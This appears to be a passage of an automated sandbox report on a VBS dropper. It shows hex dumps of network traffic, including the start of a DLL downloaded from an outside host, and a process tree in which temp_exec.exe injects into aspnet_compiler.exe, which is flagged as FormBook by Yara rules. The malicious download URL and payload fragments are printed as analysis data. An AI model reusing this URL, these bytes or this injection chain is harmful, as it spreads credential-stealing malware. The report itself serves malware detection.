^4=_dB%5=CxQvb<!Y*&ac{SHHMgbA4PXNK6=2ZT@j7j/dA!kI~h=WHiu"^tL&+xE(mZ$HY;XbG390Q_8u2Y= Dl088
2024-09-30 08:03:28 UTC	16384	IN	Data Raw: af 51 55 28 42 0e 63 9d 55 f7 33 c7 7f 20 a7 6b 65 86 2b 11 70 e9 37 54 37 2b f0 59 1d d9 29 fc 37 b4 ea 67 a9 ec 77 94 29 72 c6 58 d4 a0 2f 4b df a0 a7 19 78 32 f1 4f c8 a0 34 23 4a 3d 50 95 19 76 b0 d2 22 2b 2f e1 e8 af 49 fb 2d c0 35 9b f2 66 fe da b3 27 1d 7f 91 e4 12 a8 00 d9 4d b8 ef bd 1a 14 b4 03 c5 72 32 a9 0b 7f d9 4f b1 72 50 cb a7 ec 5a 81 3a 7d b0 49 df c4 8a 38 c1 29 ee 0f f9 b0 db 2d b2 3d 4f 41 ba f5 20 b1 64 c8 e8 8a ab 2f de 8d b5 ba d4 a1 ab 1d 1d 21 fc 66 f6 f1 c0 6b 43 7b 22 b6 67 e3 6e 3b 1e 57 7b 79 9c 67 b4 79 61 91 a6 03 21 b3 f2 e3 c5 c6 dc 38 4a b2 ec 09 41 8d b8 74 0e 03 43 88 42 d8 8b 0d 3f 90 42 7b 66 da 9b e5 d2 a6 ff 84 df 52 8e bd fd 06 eb 07 57 ad 46 47 0f 8a c5 7b a8 b6 65 3d e4 6f de 6c eb bc 9b 08 1a 57 f9 77 f6 ac d4 Data Ascii: QU(BcU3 ke+p7T7+Y)7gw)rX/Kx2O4#J=Pv"+/I-5f'Mr2OrPZ:}I8)-=OA d/!fkC{"gn;W{ygya!8JAtCB?B{fRWFG{e=olWw
2024-09-30 08:03:28 UTC	16384	IN	Data Raw: 55 fb 28 ea 05 41 42 0f 18 00 4f 0e 2c 8b c2 70 2a 15 ad f4 1b f8 30 fd f6 9d 71 a0 56 fd c7 4a 65 d1 9d f9 cb ca 6f 3e e7 b0 c5 34 64 e0 2f e1 12 71 27 0c 24 63 e0 0e 4d b2 4e 8a c2 cd 77 64 5f ef 30 95 fa db af 01 eb 32 56 9e c1 b5 5b e3 d8 14 22 56 bf f0 5d 2c e0 ee 34 48 54 af f3 de e8 49 74 08 d1 70 28 17 73 c7 d8 cc b9 94 d7 3b 27 08 9d 0a ac 17 ab 51 c0 59 26 f8 f0 ac 33 b6 78 18 07 be a0 f1 24 e6 e4 c1 85 c5 02 c9 63 bb 4b 50 1b 64 d0 e0 10 bf aa 78 2e 76 1a 5d 5f 62 14 8f 28 fc 02 13 12 c0 61 c8 5b b0 b1 6d 9d f6 fa 8b f0 2e 7e 17 0d 55 45 a7 b0 01 f7 f6 78 fb 9f 77 3e a3 8a d9 b4 f3 41 ec 37 25 36 46 bf d9 80 d2 ce 65 8c 84 00 46 58 b0 00 eb cd 8e c5 be 30 d1 0c e5 ab 09 ab 03 9d 79 3d f7 56 20 15 13 5e 6e 92 7c 80 e4 51 5b 20 04 02 db 1f 48 dc Data Ascii: U(ABO,p*0qVJeo>4d/q'$cMNwd_02V["V],4HTItp(s;'QY&3x$cKPdx.v]_b(a[m.~UExw>A7%6FeFX0y=V ^n\|Q[ H
2024-09-30 08:03:28 UTC	16384	IN	Data Raw: 33 2f 6e 25 42 80 db eb 74 b0 ae 6e 26 a9 c6 ea e2 85 af 3a 87 fd 9d a6 a9 04 f1 2e 0b ad 57 c3 43 36 bd f7 29 dc 71 b0 de 93 c0 86 6a 0f 09 4d 29 27 95 c2 80 49 7c 65 1e 4e cc a0 69 20 b9 50 27 b8 88 a8 4b d1 3b c0 82 23 f2 0d 66 c7 6a cd ed 45 9f 90 88 9a 2b 45 50 4c 33 a1 05 33 fe 95 9e 19 37 38 1a 54 45 ad 34 c0 38 0b 87 4f fd 6b 41 20 90 31 42 b0 34 e9 91 89 66 3f bb 41 23 8d 3f b3 0c 55 c6 c2 fd 4d 20 ba 15 a7 df ec 89 ff 94 d9 f3 21 cf e1 ce 78 87 ef 22 01 de 5f 17 a7 f4 98 2b 00 99 1a 37 91 07 dc 79 51 20 ef 8d 16 57 9c 28 ce e3 4d 42 f6 5d 46 7d ad d0 68 17 61 c9 7b f2 4d 02 83 d5 22 8e 7e 32 4a 01 49 a5 3a 2b 3b ee 3f 03 12 00 7d 2a 5a f4 0e 0e ab 58 88 43 1c 15 0e f2 2b 2c ec 36 a5 c2 f9 e7 79 e9 65 fd 2c 9a f9 b8 7f be f8 f0 00 a8 29 c6 a7 b5 Data Ascii: 3/n%Btn&:.WC6)qjM)'I\|eNi P'K;#fjE+EPL3378TE48OkA 1B4f?A#?UM !x"_+7yQ W(MB]F}ha{M"~2JI:+;?}*ZXC+,6ye,)
2024-09-30 08:03:28 UTC	16384	IN	Data Raw: 06 39 e1 22 dd ed b8 ec fa 8b 9f 87 74 42 83 ad a7 3a 6e b0 5a 9f e8 60 a0 2c 57 07 ad d0 31 94 82 15 8a 3e d8 09 b3 a1 2e 55 81 cb 51 c8 fe 48 92 4b bb 3e 4d 35 8f dd e5 3e 33 bd 51 25 15 db c3 60 20 27 4d f3 9e 3b 8a 2b ba ff ff 21 0d 56 48 1c 36 fc 70 d1 46 ff 40 b6 51 54 95 d9 74 78 0f 12 4c a4 cd 08 53 55 00 b4 ce 41 22 86 02 de 5c a4 74 d8 a8 89 e3 bf b5 77 04 00 a7 0a 0e 6a 8d bd fa b6 02 e2 79 e5 c7 04 3c ba 38 ee 54 35 31 b1 72 20 f9 41 3e f4 69 12 c4 73 e8 e9 f3 78 28 a5 63 fc 92 4e 1e fb f1 a8 ab a8 b2 da 4c 0a 45 42 c1 64 88 0c 5a 37 1b 37 08 1a 33 2f 8d 19 d4 d5 f0 eb c0 83 4a 3f 6d b9 cc ab c7 2f a5 6a 3c e9 33 47 f3 d8 76 d9 cf 4d 40 e6 bd b9 7e a2 22 bf 9f 4a fe 84 e9 6f e1 ad 61 03 b2 90 8f 0a f1 fa d2 3d e1 8d 47 e4 45 d9 8c 28 71 57 50 Data Ascii: 9"tB:nZ`,W1>.UQHK>M5>3Q%` 'M;+!VH6pF@QTtxLSUA"\twjy<8T51r A>isx(cNLEBdZ773/J?m/j<3GvM@~"Joa=GE(qWP

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.5	49705	185.18.213.20	443	3840	C:\Users\user\AppData\Local\Temp\temp_exec.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-30 08:03:29 UTC	66	OUT	GET /kokorila/cgl-bin/DLLL.dll HTTP/1.1 Host: dl.zerotheme.ir
2024-09-30 08:03:30 UTC	206	IN	HTTP/1.1 200 OK Connection: close content-type: application/x-msdownload last-modified: Mon, 30 Sep 2024 07:45:05 GMT accept-ranges: bytes content-length: 15360 date: Mon, 30 Sep 2024 08:03:29 GMT
2024-09-30 08:03:30 UTC	1162	IN	Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 78 f9 da 66 00 00 00 00 00 00 00 00 e0 00 2e 20 0b 01 30 00 00 34 00 00 00 38 00 00 00 00 00 00 2e 53 00 00 00 20 00 00 00 60 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 a0 00 00 00 02 00 00 00 00 00 00 03 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELxf. 048.S `@ `
2024-09-30 08:03:30 UTC	14198	IN	Data Raw: 00 00 06 12 00 28 06 00 00 06 25 26 1f 60 28 10 00 00 06 fe 01 13 16 11 16 2c 10 1a 45 01 00 00 00 f6 ff ff ff 73 17 00 00 0a 7a 11 05 11 08 fe 01 13 17 11 17 2c 30 00 09 7b 01 00 00 04 11 08 28 08 00 00 06 25 26 1f 64 28 10 00 00 06 fe 03 13 18 11 18 2c 10 1d 45 01 00 00 00 f6 ff ff ff 73 17 00 00 0a 7a 00 04 11 04 1f 68 28 10 00 00 06 58 28 18 00 00 0a 25 26 13 09 04 11 04 1f 6c 28 10 00 00 06 58 28 18 00 00 0a 13 0a 1f 70 28 10 00 00 06 13 0b 09 7b 01 00 00 04 11 05 11 09 1f 74 28 10 00 00 06 1f 78 28 10 00 00 06 28 09 00 00 06 13 0c 05 2d 0d 11 0c 1f 7c 28 10 00 00 06 fe 01 2b 0a 20 80 00 00 00 28 10 00 00 06 13 19 11 19 2c 47 1d 45 01 00 00 00 f6 ff ff ff 00 20 84 00 00 00 28 10 00 00 06 13 0b 09 7b 01 00 00 04 20 88 00 00 00 28 10 00 00 06 11 09 20 Data Ascii: (%&`(,Esz,0{(%&d(,Eszh(X(%&l(X(p({t(x((-\|(+ (,GE ({ (

Target ID:	0
Start time:	04:03:22
Start date:	30/09/2024
Path:	C:\Windows\System32\wscript.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\QT2Q1292300924.vbs"
Imagebase:	0x7ff619650000
File size:	170'496 bytes
MD5 hash:	A47CBE969EA935BDD3AB568BB126BC80
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Target ID:	2
Start time:	04:03:25
Start date:	30/09/2024
Path:	C:\Users\user\AppData\Local\Temp\temp_exec.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\temp_exec.exe"
Imagebase:	0xc90000
File size:	86'344 bytes
MD5 hash:	055742AC290225D245F94E168DC06A76
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML Detection: 21%, Virustotal, Browse
Reputation:	low
Has exited:	true

Target ID:	3
Start time:	04:03:29
Start date:	30/09/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
Imagebase:	0x270000
File size:	56'368 bytes
MD5 hash:	FDA8C8F2A4E100AFB14C13DFCBCAB2D2
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Target ID:	4
Start time:	04:03:29
Start date:	30/09/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
Imagebase:	0x790000
File size:	56'368 bytes
MD5 hash:	FDA8C8F2A4E100AFB14C13DFCBCAB2D2
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.2136321349.0000000000E30000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.2136321349.0000000000E30000.00000004.00001000.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.2136079152.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.2136079152.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
Reputation:	moderate
Has exited:	true